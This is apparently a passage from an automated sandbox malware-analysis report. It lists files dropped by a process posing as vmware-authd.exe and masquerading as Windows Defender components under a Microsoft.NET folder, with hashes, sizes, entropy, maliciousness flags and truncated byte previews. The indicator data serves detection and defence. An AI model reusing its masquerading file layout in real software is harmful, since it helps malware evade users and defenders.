Entropy (8bit):	3.57992330655092
Encrypted:	false
SSDEEP:	192:WWFmd28sT8KF7Y1+z7YNiuErC0IQ3obWNfpW7:zYd28sT1F7Y1+z7YNiuErC0IQ3YWNfp0
MD5:	E38287B098C2A55EE69A224BE73C93E8
SHA1:	0422464BBDA490FBC74896494318B5A141CF2710
SHA-256:	B61780AE34673BF797B85387036E01A03DB9F3D949BC23AD87EFD0A1D7EBA03E
SHA-512:	9126D8CDA5E1E898D443B9A6B8757F0FC205E599DE84241C0F0418857FA0D30DE1885AD5D04E539476500C15C6BEB4E2AB438564B7A6DDD3E7A898621059C6C6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......... ...............................................@............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....oM.7........l...P...P.......oM.7........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... ...Z..../..)......C....b.)....oM.7........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7680
Entropy (8bit):	3.529446079422097
Encrypted:	false
SSDEEP:	96:ZqJtrkDSJ6Spy99V9KzEcEKLqmqYgAMkL1J+8PUnW4+EW6brWwg:ZqJOvDAzzgYR7AW4TW6brWD
MD5:	D186BEDACDCCA084DA65C65D598EBCA8
SHA1:	3C48928EC8FE199545C0AD5ADEE27A5AC61E3D99
SHA-256:	363B8713FA608B54832C5F78E17331D94F0E888B98A0337467B5B1A5A18E7B75
SHA-512:	4B1774C4200BCD1161C8B00A9D5FFF11B6FDE35559531A578DA0EE6ED97A255FFF4FFC2B3C1E28DFCCCD2D77E616B92F91749F4BFD2999C105A00809C2D1359E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................@............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....o..........l...P...P.......o..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..p....rsrc$01....p"..8....rsrc$02.... ...5...p.......9ps].A,wEW.....o..........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35840
Entropy (8bit):	3.534239180172005
Encrypted:	false
SSDEEP:	768:zFMCgGn67PzUf+YXIurmXuQmMVhjhxpIE:z2CpjZXIVXPiE
MD5:	3C50201BA7B59C83412E463689D9798B
SHA1:	A97F6D79D365B72F0AADCF2EA0B77C1FBD0940E3
SHA-256:	DD449C37F48009C37ADA9339185E8B30A50CC97F17E2979AFBE04B9A40F2B26A
SHA-512:	32DFF7044961E0254E38D592734F1B2566D4F079DE1611C6866F437F7DA9F2B257A89CA84C46D832B8CCA394866BF60B6203DAC2DD680C11FAC17A2D72BB23EC
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.................................................................d....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....]'.........l...P...P........]'.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%......rsrc$02.... ...@.`........m\.L.HO...i.<.U.x.]'.........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.mfl

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with very long lines (11632), with CRLF line terminators
Category:	dropped
Size (bytes):	95866
Entropy (8bit):	3.503699910346522
Encrypted:	false
SSDEEP:	768:r7EIEB87ovwzUHfRWKXdxXMJHro8ozUUCaOZ5f5XPu1QcQBQEY46bY4814OT6/5k:rK4GXMa4BXPrY46bY48iOO/2
MD5:	675269F40380DCD00A2E2144A57F610A
SHA1:	B663129AD88776319E98519784CE2B21765AB196
SHA-256:	87E91B7FE6743B8DF9379E109B543D5BF6F41AB16198BB0DAD78D1C249D61B1F
SHA-512:	0E79DE4580FBC1E44DEB12AF91052125D0860574C4B2CBD9DCFB6F02DA6A568BCD11C34E35EAF403E78F112FC532FE5138C5FE0E5D43348483BD5A72F93DD65D
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).....i.n.s.t.a.n.c.e. .o.f. ._._.n.a.m.e.s.p.a.c.e.{. .n.a.m.e.=.".M.S._.4.0.9.".;.}.;.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.0.9.".).........[.D.e.s.c.r.i.p.t.i.o.n.(.".T.h.i.s. .i.s. .a.n. .a.b.s.t.r.a.c.t. .c.l.a.s.s. .t.h.a.t. .s.h.o.w.s. .t.h.e. .b.a.s.e. .s.t.a.t.u.s...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.0.9.".).]. .....c.l.a.s.s. .B.a.s.e.S.t.a.t.u.s.....{.....}.;.........[.D.e.s.c.r.i.p.t.i.o.n.(.".T.h.i.s. .i.s. .a.n. .a.b.s.t.r.a.c.t. .c.l.a.s.s. .t.h.a.t. .s.h.o.w.s. .t.h.e. .b.a.s.e. .s.t.a.t.u.s...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.0.9.".).]. .....c.l.a.s.s. .M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.

C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement_Uninstall.mfl

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1118
Entropy (8bit):	3.459513705694916
Encrypted:	false
SSDEEP:	24:QXbclTUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvlR:enjDGwJ3r24RFZC
MD5:	AFE6664D26D5D05B4568E329BE37D7DE
SHA1:	2F6FD02E26E9F3A09866F3C106A8C1539B50D46F
SHA-256:	B6BAC201F1586B4C357521C46421086557A0DF86A022B120B723EB047E450D43
SHA-512:	8C1AF20BF892C303F8247B6E991A96A59CB0C65AB7E11C630282AA1B091FAEA8B27AA08210249FE2B47FA9488834E82487490581B54B236461FE61CF346F623E
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.0.9.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.

C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	3.3889790046988564
Encrypted:	false
SSDEEP:	48:ypY55M0IyyS/kVrx1TIZWqHWq6sffm0/iy5Ww13/:73IakVrvTEWiH5Wwd
MD5:	C99D5885AAB799E23E6E5498D0D1B07C
SHA1:	33450BDC3CDA46CEC0AF5467826143C46624E597
SHA-256:	C789A39DE6F9DF1A85BDB495D7F9955E1F673FBDBC0B77863D4595A4C4DA82F4
SHA-512:	8E583EBCC5A867E38BBB0A8A9EE40976AE949A130E2C4DB7B7CB82B3E815E3E785E15411BA4AADCF84ABCA8783E02D09FDDBAE736C3F326EC851D1B2193EC3B8
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0......W.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....5<)........l...P...P........5<)........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....x.j...!(y....l......)(2r.5<)........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\endpointdlp.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	685328
Entropy (8bit):	6.2613956335812
Encrypted:	false
SSDEEP:	12288:pRCT1SH7y45rUcOoza9hW+WSAh7Z1a6MLoloKfihqPgwX:pySH7yGUI+WL7ra6MLolrfihqh
MD5:	113DB043FE13F4635D0A65FDF100CFD3
SHA1:	1DF847E5E1680669FE0DF779B66942C521B47012
SHA-256:	716BA8B125E70C4D717262381B3A31203C41442B680651729ADF12059B53123F
SHA-512:	0B66C78C11DF7FCB8971FDB658D9372E06CC2A0D5AA116864E2D79099E660FB1A9F40368BFE590C6CCE5AA07DA592F89F0327D8EC02467EFBF720860C47BEB16
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..[6..[6..[6...C..Z6..D..N6..[6..x7..D..H6..D..x6..D..6..D..Y6...C..Z6...C...6...C..Z6...C..Z6..Rich[6..........................PE..d.....&..........." .........`......@........................................p............`A............................................<............P..0........P...P...%...`......0...p...................XN..(... M..8............N...............................text...E........................... ..`.rdata.............................@..@.data...h@.......0..................@....pdata...P.......`..................@..@.rsrc...0....P.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	3.688226991598996
Encrypted:	false
SSDEEP:	24:eH1GSp8zgpXLUCZIN/G15JqZW0Iyc5ArqA5+DScNffzJ2Uh7/5L3guolb9fPN3Tu:ypA2zZ+G1zqZW7PA5afff5TN4x93S
MD5:	66D970ACC9C33581B9E3152CDF46C707
SHA1:	7C3ACD65D71B94837B837DFB52C1FC48E8B98F0C
SHA-256:	36F0DA44D38A45FD585CFC84B03C00185DB00F103A655821B5BD6FCCD88EB426
SHA-512:	C154E38181825C9F844ECEBAC6213FBA9C2792849097451758FCE11D728763135CA0211BB91BFADA310B2C371D77B25E6BD4CA131AD8E72815543A2F7909DFB2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....a..........l...P...P........a..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...p..uI..$f.}II...3v...~.qIp;.a..........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55808
Entropy (8bit):	3.370538627905652
Encrypted:	false
SSDEEP:	384:8ELIoHwex9cxks8ntGfFDD4vlzAQQ+8+jBUJ3P+/npK5sD8XOHKXSXSXuCilXYMY:dLIoHwex9cxMtOkA3+FRpKIl5i
MD5:	50C3A70FA84C07A424EC3D2834D06523
SHA1:	4FD26B0566F31172BAC62B839ED5CB62B6625AD5
SHA-256:	95A2C437329C4C4DF4919152BC90284A90857122E4B9C868C36F103ACC52A028
SHA-512:	DE9358CE4269187C60F9CFD7E4B913747A403BC2F069C877E220AED02B63AFEC6BA115B4F79C1BBD4AC80DCFBBDBFC1739DDE34983D8DC0A10B027B41142CB91
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................6V....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....d...........l...P...P.......d...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..@....rsrc$02.... ....^K..8.........HQM....H..IMd...........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	47104
Entropy (8bit):	3.506031927133505
Encrypted:	false
SSDEEP:	384:RXSmktkGpXilFdOUry+KoK2o4XqPA/RDkVQyiQ8oiKEu8+k9Ko8uWJl:E5tVD0DuZl
MD5:	CE84B2A9F6DF190FA977504B51536808
SHA1:	08EC7406B12042AD09EE7D3124863A57CE30F197
SHA-256:	A7224212D1D6FEC1558709633EBB1580CFB6CAB230624F548239A974C7A0D6AF
SHA-512:	5F68ABC2DB6A92D195D656695A22FC5C01F135263966567227A7771F3ECA4B7690BB5278B49B30E8BD11EE4124D29F943241E0AA5A69B69FB5202DCDD2B80841
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................q.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....D%.........l...P...P........D%.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02.... ..........f...T.e.J#.3...:.o...D%.........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	3.583197744926803
Encrypted:	false
SSDEEP:	192:7HXRd28sT8KNWW+WfjIWe/W9WZWeWW+WfjIWe/WlWkNWSuWOJW:7hd28sT1NWXWkW+W9WZWeWXWkW+WlWk/
MD5:	5D46933E794A91BFDF12CDA3348BDE8B
SHA1:	F940EC0F7C8DC00F599D24020C6785D217C8B07F
SHA-256:	69550BAD9F1CD6BAB05EC9DACD5A105BF2CBD93856217AFD6722F9C62CAB104F
SHA-512:	CCDC2E8015CC1C97B475A32F7F451C1B78CD1C80CD10E79DB123A30D5B8BA120F0D5CD68DC25DD19A09834553D072E56A4AC406AEC4C73B7DC9E199D8309C6A1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......... ...............................................@......^.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....oM.7........l...P...P.......oM.7........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... ...Z..../..)......C....b.)....oM.7........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.658761008984688
Encrypted:	false
SSDEEP:	96:82qJtEfs2mSpy99V9KzEcEKLqBrEhMABGTzG1BNB9SBJWp+CWMeO4x9:82qJaPmDAzzDgBJWpFWMeT9
MD5:	353FFC1C5EAF0A900FABCAAB968ED76E
SHA1:	ED9F2EDA723C924D2F22F9B1F3EDF0A0B522A02B
SHA-256:	36B16B933C7E5EB93A2AD8D11F38C7793B60F09472EC9664C17E786C7361551E
SHA-512:	A28C3EC8A503BB133B9EFA158D6454CB6A39A3A4F4E98C13A19901D4DE1A86153AC081B5AF8B9CF01D45A33A8946A07CB1DB2081D89D2EB1A431416DA171542A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................@......Mk....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....o..........l...P...P.......o..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..p....rsrc$01....p"..8....rsrc$02.... ...5...p.......9ps].A,wEW.....o..........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	3.5026787417351337
Encrypted:	false
SSDEEP:	384:0R6xvTgGhZ88YmErAJwj18ChH1WgQLP89oH10fBrLjDWQWyg:qogaHYtAfc1akI1aLPg
MD5:	6817F98F4E0D412F0313C417100B89A6
SHA1:	4B1D40AE23935F47BE28E45827404C008481BE5B
SHA-256:	BA423B0529EDD4AC44F0A8FA2AABB28A3B422EEF351C3E0C06E44544350683CC
SHA-512:	07034BA97D2CF7C7334E72F998529A40C6AFB0B94881DA107ABDAB09753A8F7B575451AB06B0C6BC52BBE230B4B14F6BDA3612B9B65C7E1C0027DAD53CC34BC5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.....................................................................@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....]'.........l...P...P........]'.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%......rsrc$02.... ...@.`........m\.L.HO...i.<.U.x.]'.........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.mfl

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with very long lines (9654), with CRLF line terminators
Category:	dropped
Size (bytes):	103370
Entropy (8bit):	3.5117432836886926
Encrypted:	false
SSDEEP:	1536:0UijGqj13Lh495o14sJ5nGY4w2Y4CZnm//:WGqjFC95oqkVZk
MD5:	EAC0C55B5DDE369B236E10E36FAFECA5
SHA1:	1E19CE7B3E89460ABE9552E6B7EB3CECE169C67F
SHA-256:	71FB552585CD8C9496BF3127A6D032E6C76DFCF6C5A141B546A735F214905CCE
SHA-512:	B7406D4E02D65248DE901C6FD4CACF53A37FC932188B40FEB564937DA777296CBE22899893BCB00C56DCB5EC2D9F7966C1506BC76A2490AFD15CFA54B3F15C7C
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).....i.n.s.t.a.n.c.e. .o.f. ._._.n.a.m.e.s.p.a.c.e.{. .n.a.m.e.=.".M.S._.4.1.6.".;.}.;.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.1.6.".).........[.D.e.s.c.r.i.p.t.i.o.n.(.".E.s.t.a. ... .u.m.a. .c.l.a.s.s.e. .a.b.s.t.r.a.t.a. .q.u.e. .m.o.s.t.r.a. .o. .s.t.a.t.u.s. .b.a.s.e...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.1.6.".).]. .....c.l.a.s.s. .B.a.s.e.S.t.a.t.u.s.....{.....}.;.........[.D.e.s.c.r.i.p.t.i.o.n.(.".E.s.t.a. ... .u.m.a. .c.l.a.s.s.e. .a.b.s.t.r.a.t.a. .q.u.e. .m.o.s.t.r.a. .o. .s.t.a.t.u.s. .b.a.s.e...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.1.6.".).]. .....c.l.a.s.s. .M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s. .

C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement_Uninstall.mfl

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1118
Entropy (8bit):	3.459513705694916
Encrypted:	false
SSDEEP:	24:QXbclK2UWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvT:e1TjDGwJ3r24RFZC
MD5:	606AA235BE1B21761E91A75475BB4CCA
SHA1:	437D21FC2BDD385A6540428B2B99D45191A38BB2
SHA-256:	9437B33FEDF880B480913612671D83AA56D7753B76D5E728DD73B9205E8A9B98
SHA-512:	3DAB122B4C4E868E687888579C0C3D3EAB561BA9F560B9A01ECC705FC5FD41B52EE42BC749382C122BA3DAA9BC203B1231DCC948654C36DC2F9B0D47A62AD6BF
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.1.6.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.

C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.7438394010156575
Encrypted:	false
SSDEEP:	48:ypr95MHUR8U6NFc4qy/F1rqZWd9hffmb/i7N4x93S:q0oyW9urCWCI4xs
MD5:	3464E072F66FFE6CF4DF06CF9C11D331
SHA1:	197566FD1A73D5BE8D3A720A51DB02329C6DFC54
SHA-256:	EF12115438168F6CFD797E991A7BE561812719EB31127EBC8E0B418726452520
SHA-512:	1FBC4432610257E7A5A152E07EA905EEF6DF0F15558231C01AA4C0E89A39C9FF6ABF77C8C9644BDB224B47B9E4915DA16CAFD3CC3C58A74F9EC7A9E5C4D9AD2A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0............@.......................................... .. ...............................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....5<)........l...P...P........5<)........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....x.j...!(y....l......)(2r.5<)........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\readfile.txt

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:y:y
MD5:	81051BCC2CF1BEDF378224B0A93E2877
SHA1:	BA8AB5A0280B953AA97435FF8946CBCBB2755A27
SHA-256:	7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
SHA-512:	1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
Malicious:	false
Preview:	..

C:\Program Files (x86)\Microsoft.NET\shellext.dll

Download File

Process:	C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468312
Entropy (8bit):	5.621872137435956
Encrypted:	false
SSDEEP:	6144:+/fJNDoSCaKgg6OEBCOJzXv5ApNMY0lESLMp+W8j1sl3FIY/VLIVuV3Y0CC7HHmc:+/fDTCzgg6T3ALULE+WNl3yCIBL+
MD5:	85E67579A416A86D726D4AEC49F0EF87
SHA1:	2D7D1C1213B09924F926D9C6197A60CC3F617B3C
SHA-256:	112891EB9C3B06F6B95919E34BDDC607AF76EB9AEAEDE8E3BF3147709F0AE3B4
SHA-512:	0FB7A0C0A510A4EC9540B5A6EBA94D27BEEB4B9AE7E17DEF1DD3EF095ACAE5E66ED067EFE4A9873EB73969F48EBF29A0B7B042CEFA9C1E2187B41C00F3ED933F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-G..i&..i&..i&..`^<.o&.."^..m&.."^..{&..i&...'.."^..L&.."^..c&.."^..h&.."^...&.."^P.h&.."^..h&..Richi&..........PE..d....l\..........." .........0...... ...............................................p,....`A................................................x............c...`...-......X%...........R..p.......................(...@...@............................................text............................... ..`.rdata..Z).......0..................@..@.data....H.......@..................@....pdata...-...`...0...P..............@..@.rsrc....c.......p..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

